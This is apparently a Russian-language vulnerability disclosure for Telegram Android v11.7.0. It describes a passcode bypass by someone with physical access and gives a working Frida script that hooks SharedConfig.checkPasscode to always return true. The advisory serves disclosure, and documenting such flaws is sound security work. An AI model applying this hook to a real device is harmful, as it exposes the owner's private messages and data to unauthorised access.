
Frida-основанная proof-of-concept, демонстрирующая обход аутентификации в Telegram Android путем перехвата SharedConfig.checkPasscode для постоянного возврата true, что обеспечивает несанкционированный доступ.
Проблема в классе SharedConfig APK Telegram Android v.11.7.0 позволяет физически близкому злоумышленнику обойти аутентификацию и повысить привилегии, манипулируя возвращаемым значением метода checkPasscode.
Обход аутентификации
Telegram
Telegram Android APK v.11.7.0
org.telegram.messenger.SharedConfig
Java.perform(function() {
// Locate the SharedConfig class in the target application
var PassCodeActivity = Java.use('org.telegram.messenger.SharedConfig');
// Hook the checkPasscode method to modify its behavior
PassCodeActivity.checkPasscode.implementation = function(passcode) {
// Bypass the actual passcode check by always returning true
return true;
};
});
https://drive.google.com/file/d/1-lW1IQiCyj-8UXZOTedYPGPhQwfMLX4M/view?usp=sharing
Данная уязвимость представляет собой проблему обхода аутентификации на стороне клиента. Она затрагивает пользователей, которые полагаются на функцию кода доступа для защиты конфиденциальных данных или ограничения доступа к определенным функциям приложения. Используя этот недостаток, физически близкий злоумышленник может манипулировать процессом проверки кода доступа, обойти аутентификацию и получить несанкционированный доступ к защищенным областям приложения. Это может привести к раскрытию конфиденциальных данных пользователя или совершению несанкционированных действий в приложении.